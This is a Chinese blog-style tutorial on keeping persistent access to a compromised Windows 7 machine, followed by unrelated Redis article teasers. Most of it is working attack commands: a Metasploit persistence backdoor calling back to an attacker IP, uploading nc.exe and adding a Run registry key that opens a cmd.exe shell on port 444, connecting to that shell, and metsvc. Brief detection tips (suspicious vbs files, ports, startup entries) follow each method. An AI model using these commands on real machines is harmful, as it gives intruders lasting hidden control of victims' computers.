百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 热门文章 > 正文

Windows攻防实战之后门

bigegpt 2024-08-09 11:11 2 浏览

声明:谢绝一切形式的转载,禁止用作非法目的

当通过木马或者漏洞成功入侵别人电脑后,由于MSF发起的攻击都是基于内存的,因此,当被入侵的电脑关机之后或者漏洞修复之后,前期建立的连接就都不复存在了。所以,有必要在被入侵的电脑上安装后门,让"肉鸡"每次重启之后,都能和自己的机器自动建立连接。

准备条件

"肉鸡": Windows7 32位 防火墙开启

通过木马建立连接

具体内容可参考这里

Persistence 后门

建立后门

通过下面的帮助信息,可以看出persitence模块是用来在目标机器上创建后门的脚本。比较常用的参数-A 、-X、-I、-p、-r,具体含义可查看帮助。

meterpreter > run persistence -h[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.[!] Example: run exploit/windows/local/persistence OPTION=value [...]Meterpreter Script for creating a persistent backdoor on a target host.OPTIONS:    -A        Automatically start a matching exploit/multi/handler to connect to the agent    -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)    -T <opt>  Alternate executable template to use    -U        Automatically start the agent when the User logs on    -X        Automatically start the agent when the system boots    -h        This help menu    -i <opt>  The interval in seconds between each connection attempt    -p <opt>  The port on which the system running Metasploit is listening    -r <opt>  The IP of the system running Metasploit listening for the connect back

建立一个后门,每隔5s尝试建立连接,自动匹配模块exploit/multi/handler连接黑客的机器。

run persistence -A -X -i 5 -p 9988 -r 192.168.42.49

运行命令之后,可以看出生成了一个vbs脚本。Persistence 后门基于的就是这个脚本。

杀死9988端口对应的会话。

sessions -k 5

过一会,发现9988端口的会话又建立起来了。

将"肉鸡"重启,查看9988端口的会话是否会被重新建立。

从图中可以看出,重启之后,会话又被成功建立起来了。

检测后门

(1)查看相应的目录是否有可疑的vbs。 (2)查看可疑端口 (3)查看可疑的开机启动项

nc后门

建立nc后门

nc.exe具有"瑞士军刀"的美名,其在反向连接方面的功能可以用强大甚至恐怖来形容。

上传nc后门到"肉鸡"

upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

枚举注册表内容(开机启动),注册表相关的内容在前面有介绍。

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

在该注册表增加内容(开机启动)

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe"

查看内容

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

具体过程如下:

重启"肉鸡",通过nc连接

nc 192.168.42.40 444

成功连接后,能够获得肉鸡的cmd终端:

检测nc后门

  1. 通过主注册表的开机启动项目进行检测。
  2. 通过nc程序名字进行检测,这个很容易绕过,改成具有迷惑行为的名字就可以
  3. 可疑端口检测

metsvc后门

使用如下命令

 run metsvc

然后重启之后,通过bind_tcp进行主动连接。 由于版本问题,在win7 32位上,相应的服务起不来,不做过多介绍。

写在最后

后门植入,是进行持续性攻击的有效手段。其基本原理大都是基于开启启动项,大多数都是通过注册表实现的,因此,开机启动项要认真辨别,否则,你的机器可能就是一台"肉鸡"。

公众号

相应的视频,后续会更新。更多内容,欢迎关注我的微信公众号:无情剑客。


相关推荐

10w qps缓存数据库——Redis(redis缓存调优)

一、Redis数据库介绍:Redis:非关系型缓存数据库nosql:非关系型数据库没有表,没有表与表之间的关系,更不存在外键存储数据的形式为key:values的形式c语言写的服务(监听端口),用来存...

Redis系列专题4--Redis配置参数详解

本文基于windowsX64,3.2.100版本讲解,不同版本默认配置参数不同在Redis中,Redis的根目录中有一个配置文件(redis.conf,windows下为redis.windows....

开源一夏 | 23 张图,4500 字从入门到精通解释 Redis

redis是目前出场率最高的NoSQL数据库,同时也是一个开源的数据结构存储系统,在缓存、数据库、消息处理等场景使用的非常多,本文瑞哥就带着大家用一篇文章入门这个强大的开源数据库——Redis。...

redis的简单与集群搭建(redis建立集群)

Redis是什么?是开源免费用c语言编写的单线程高性能的(key-value形式)内存数据库,基于内存运行并支持持久化的nosql数据库作用主要用来做缓存,单不仅仅是做缓存,比如:redis的计数器生...

推荐几个好用Redis图形化客户端工具

RedisPlushttps://gitee.com/MaxBill/RedisPlusRedisPlus是为Redis可视化管理开发的一款开源免费的桌面客户端软件,支持Windows、Linux...

关于Redis在windows上运行及fork函数问题

Redis在将数据库进行持久化操作时,需要fork一个进程,但是windows并不支持fork,导致在持久化操作期间,Redis必须阻塞所有的客户端直至持久化操作完成。微软的一些工程师花费时间在解决在...

你必须懂的Redis十大应用场景(redis常见应用场景)

Redis作为一款高性能的键值存储数据库,在互联网业务中有着广泛的应用。今天,我们就来详细盘点一下Redis的十大常用业务场景,并附上Golang的示例代码和简图,帮助大家更好地理解和应用Redis。...

极简Redis配置(redis的配置)

一、概述Redis的配置文件位于Redis安装目录下,文件名为redis.conf(Windows名为redis.windows.conf,linux下的是redis.conf)你可以通过C...

什么是redis,怎么启动及如何压测

从今天起咱们一起来学习一下关于“redis监控与调优”的内容。一、Redis介绍Redis是一种高级key-value数据库。它跟memcached类似,不过数据可以持久化,而且支持的数据类型很丰富。...

一款全新Redis UI可视化管理工具,支持WebUI和桌面——P3X Redis UI

介绍P3XRedisUI这是一个非常实用的RedisGUI,提供响应式WebUI访问或作为桌面应用程序使用,桌面端是跨平台的,而且完美支持中文界面。Githubhttps://github....

windows系统的服务器快速部署java项目环境地址

1、mysql:https://dev.mysql.com/downloads/mysql/(msi安装包)2、redis:https://github.com/tporadowski/redis/r...

window11 下 redis 下载与安装(windows安装redis客户端)

#热爱编程是一种怎样的体验#window11下redis下载与安装1)各个版本redis下载(windows)https://github.com/MicrosoftArchive/r...

一款轻量级的Redis客户端工具,贼好用!

使用命令行来操作Redis是一件非常麻烦的事情,我们一般会选用客户端工具来操作Redis。今天给大家分享一款好用的Redis客户端工具TinyRDM,它的界面清新又优雅,希望对大家有所帮助!简介Ti...

一个.NET开发且功能强大的Windows远程控制系统

我们致力于探索、分享和推荐最新的实用技术栈、开源项目、框架和实用工具。每天都有新鲜的开源资讯等待你的发现!项目介绍SiMayRemoteMonitorOS是一个基于Windows的远程控制系统,完...

Redis客户端工具详解(4款主流工具)

大家好,我是mikechen。Redis是大型架构的基石,也是大厂最爱考察内容,今天就给大家重点详解4款Redis工具@mikechen本篇已收于mikechen原创超30万字《阿里架构师进阶专题合集...